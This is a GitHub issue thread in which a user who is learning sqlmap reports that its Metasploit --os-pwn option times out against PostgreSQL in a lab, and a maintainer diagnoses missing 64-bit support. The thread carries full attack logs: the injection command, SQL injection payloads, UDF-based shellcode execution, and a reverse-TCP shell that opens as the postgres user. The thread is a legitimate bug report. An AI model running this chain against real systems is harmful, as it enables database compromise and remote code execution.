It didn't work. Not sure what's strange here?

On Sep 21, 2016 21:20, "Leonardo Esparis" notifications@github.com wrote:

hi,

when im trying to use metasploit with sqlmap,
a timeout is raised, any suggestion?

[15:10:54] [INFO] testing connection to the target URL
[15:10:54] [INFO] heuristics detected web page charset 'ascii'
[15:10:55] [INFO] checking if the target is protected by some kind of
WAF/IPS/IDS
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or
near "("
LINE 1: SELECT * FROM users WHERE id=(1(.,),').,') OFFSET 0 LIMIT 1
^'
[15:10:55] [INFO] heuristic (basic) test shows that GET parameter 'id'
might be injectable (possible DBMS: 'PostgreSQL')
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or
near "'MYkyOC<'"
LINE 1: SELECT * FROM users WHERE id=(1'MYkyOC<'">bxcrbJ) OFFSET 0 L...
^'
[15:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might
be vulnerable to cross-site scripting attacks
[15:10:55] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test
payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL'
extending provided level (1) and risk (1) values? [Y/n]
[15:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:10:56] [WARNING] time-based comparison requires larger statistical
model, please wait............................ (done)

[15:11:07] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1
stacked queries (comment)' injectable
[15:11:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:11:07] [INFO] checking if the injection point on GET parameter 'id' is
a false positive
[15:11:17] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or
near "20"
LINE 1: ...T * FROM users WHERE id=(1);SELECT (CASE WHEN (80 20) THEN (...
^'
GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 38
HTTP(s) requests:

Parameter: id (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--

[15:11:37] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: PostgreSQL
[15:11:37] [INFO] fingerprinting the back-end DBMS operating system
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfile"
does not exist'
[15:11:37] [WARNING] it is very important to not stress the network
adapter during usage of time-based payloads to prevent potential
disruptions
[15:11:37] [INFO] the back-end DBMS operating system is Linux
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table
"sqlmapfilehex" does not exist'
[15:11:37] [INFO] testing if current user is DBA
[15:11:42] [INFO] detecting back-end DBMS version from its banner
[15:11:42] [INFO] retrieved: 9.1.23
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
1
[15:13:33] [INFO] checking if UDF 'sys_bineval' already exist
[15:13:33] WARNING http://case time-based comparison requires larger
statistical model, please wait.............................. (done)

UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N]
[15:13:46] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N]
how do you want to execute the Metasploit shellcode on the back-end
database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)

[15:13:57] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Bind TCP: Listen on the database host for a connection

what is the local address? [Enter for '192.168.2.10' (detected)]
which local port number do you want to use? [38748]
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)

[15:14:02] [INFO] creation in progress .......... done
[15:14:12] [INFO] running Metasploit Framework command line interface
locally, please wait..
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################

###

####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########

#######################

# ### #

########################

##

http://metasploit.com

=[ metasploit v4.12.25-dev ]

• -- --=[ 1577 exploits - 901 auxiliary - 272 post ]
• -- --=[ 455 payloads - 39 encoders - 8 nops ]
• -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 38748
LHOST => 192.168.2.10
[
] Started reverse TCP handler on 192.168.2.10:38748
http://192.168.2.10:38748 [] Starting the payload handler...
[15:14:37] [INFO] running Metasploit Framework shellcode remotely via UDF
'sys_bineval', please wait..
[15:19:13] [CRITICAL] timeout occurred while attempting to open a remote
session

D=

—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
#2173, or mute the thread
https://github.com/notifications/unsubscribe-auth/AA4P0x2XLuL59oqhtS3afgEg48lKPSFEks5qsYNagaJpZM4KDLbJ
.

why did not work?
i mean, im learning about sqlmap and i want to know when it will work?
im using sqlmaproject testenv..

Are you sure that it is 32-bit environment? Also, please make a quick test
on that same listening machine whether it is possible to connect to some
arbitrary port in the first place. Google for netcat server/client

Bye

On Sep 21, 2016 21:25, "Leonardo Esparis" notifications@github.com wrote:

why did not work?
i mean, im learning about sqlmap and i want to know when i will work?
im using sqlmaproject testenv..

—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
#2173 (comment),
or mute the thread
https://github.com/notifications/unsubscribe-auth/AA4P0-a1AR1s7e4ub38nq8-gmveBKTdPks5qsYSUgaJpZM4KDLbJ
.

both computer can communicate with netcat and the problem persist

# python sqlmap.py -u "http://debiandev/sqlmap/pgsql/get_brackets.php?id=1" --technique=S --os-pwn --batch
         _
 ___ ___| |_____ ___ ___  {1.0.9.24#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:52:19

[12:52:19] [WARNING] you did not provide the local path where Metasploit Framework is installed
[12:52:19] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[12:52:19] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[12:52:19] [INFO] resuming back-end DBMS 'postgresql' 
[12:52:19] [INFO] testing connection to the target URL
[12:52:19] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1);SELECT PG_SLEEP(5)--
---
[12:52:19] [INFO] the back-end DBMS is PostgreSQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[12:52:19] [INFO] fingerprinting the back-end DBMS operating system
[12:52:19] [INFO] the back-end DBMS operating system is Linux
[12:52:19] [INFO] testing if current user is DBA
[12:52:19] [INFO] detecting back-end DBMS version from its banner
[12:52:19] [INFO] resumed: 8.3.9
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[12:52:19] [INFO] checking if UDF 'sys_bineval' already exist
[12:52:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                                                                                       
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] N
[12:52:24] [INFO] checking if UDF 'sys_exec' already exist
[12:52:24] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions 
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] N
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[12:52:29] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.146.1' (detected)] 192.168.146.1
which local port number do you want to use? [7122] 7122
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[12:52:29] [INFO] creation in progress ..... done
[12:52:34] [INFO] running Metasploit Framework command line interface locally, please wait..

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.11.8-dev-a030179                  ]
+ -- --=[ 1518 exploits - 877 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 7122
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:7122 
[*] Starting the payload handler...
[12:52:40] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[12:52:40] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                                                                              
[*] Sending stage (36 bytes) to 192.168.146.130
[*] Command shell session 1 opened (192.168.146.1:7122 -> 192.168.146.130:14030) at 2016-09-23 12:52:40 +0200

pwd
/var/lib/postgresql/8.3/main
whoami
postgres

Can you please check the /tmp folder in the target machine itself whether there are any new files after you run the --os-pwn, like e.g.:

debian-5:/tmp# ll
total 212
-rw-rw---- 1 informix informix   1749 Jun  1 11:47 blduser.out.2130
-rw-rw---- 1 informix informix   6365 Jun  1 11:46 bldutil.2130
-rw-rw---- 1 informix informix 184475 Jun  1 11:45 buildsmi.2130
-rw-rw---- 1 informix informix    137 Jun  1 11:22 buildsmi.2130.drop
-rw-r--r-- 1 postgres postgres   5124 Jun  3 10:26 libsrfxw.so

Please pull the latest revision and retry. There is a possibility that it will work :). Reduced the size(s) of uploaded .so libraries - size constraints regarding file upload size is the standard issue on PostgreSQL SQLi

mm nope, did not work either D= and im using 64 bits architecture on victim machine..
but victim has postgresql 9.5..

victim machine /tmp folder, 64 bit architecture is supported?

drwxrwxrwt  7 root     root     4096 sep 23 13:51 24 00:17 ./
drwxr-xr-x 24 root     root     4096 sep 23 13:51 22 14:30 ../
-rw-r--r--  1 postgres postgres 6152 sep 23 13:51 23 23:58 libshchw.so
-rwxr--r--  1 postgres postgres 3516 sep 23 13:51 24 00:07 tmpseuiih*

         _
 ___ ___| |_____ ___ ___  {1.0.9.32#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:13:41

[17:13:41] [INFO] resuming back-end DBMS 'postgresql' 
[17:13:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1) AND 7969=7969 AND (4138=4138

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: id=1) AND 8237=CAST((CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8237=8237) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC) AND (9870=9870

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1);SELECT PG_SLEEP(5)--

    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: id=1) AND 1926=(SELECT 1926 FROM PG_SLEEP(5)) AND (5118=5118

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1) UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(112)||CHR(122)||CHR(107)||CHR(113))||(CHR(69)||CHR(113)||CHR(84)||CHR(111)||CHR(89)||CHR(84)||CHR(74)||CHR(121)||CHR(88)||CHR(99)||CHR(88)||CHR(75)||CHR(82)||CHR(111)||CHR(106)||CHR(84)||CHR(70)||CHR(89)||CHR(122)||CHR(112)||CHR(89)||CHR(109)||CHR(106)||CHR(88)||CHR(69)||CHR(86)||CHR(87)||CHR(68)||CHR(122)||CHR(104)||CHR(121)||CHR(106)||CHR(114)||CHR(80)||CHR(78)||CHR(113)||CHR(100)||CHR(99)||CHR(104)||CHR(85))||(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113))-- VXgp
---
[17:13:41] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: PostgreSQL
[17:13:41] [INFO] fingerprinting the back-end DBMS operating system
[17:13:41] [INFO] the back-end DBMS operating system is Linux
[17:13:41] [INFO] testing if current user is DBA
[17:13:41] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[17:13:42] [INFO] checking if UDF 'sys_bineval' already exist
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N] 
[17:13:48] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] 
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[17:13:52] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.2.10' (detected)] 
which local port number do you want to use? [22816] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[17:14:09] [INFO] creation in progress ........... done
[17:14:20] [INFO] running Metasploit Framework command line interface locally, please wait..
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.12.25-dev                         ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 22816
LHOST => 192.168.2.10
[*] Started reverse TCP handler on 192.168.2.10:22816 
[*] Starting the payload handler...
[17:14:46] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[17:14:47] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                  
[17:19:21] [CRITICAL] timeout occurred while attempting to open a remote session

Just downloaded one TurnKey 64-bit machine with PostgreSQL and it seems that you are right. I'll need to fix the support for --os-pwn against 64-bit PostgreSQL. Please give me some time as I'll be away for the weekend.

p.s. sqlmap's upload of those .so files is working perfectly (related UDF functions are working even when calling them manually)

okay .. =P

Just a quick update. Situation seems to be more complicated than I thought. As Bernardo originally implemented that part it seems that support for 64-bit version has never been done in the first place. For example shellcodeexec perfectly works in 32-bit environment because of things like Metasploit's x86/alpha_mixedwhich gives you a alphanumeric payload (perfect for placing it into the shellcodeexec's argument) to be used in 32-bit case, but there is no similar encoder for x64. Also, if using the 32-bit version of shellcodeexec in the 64-bit environment, 32-bit OS libraries have to be preinstalled (e.g. ia32-libs) by the administrator himself. Anyway, give me some time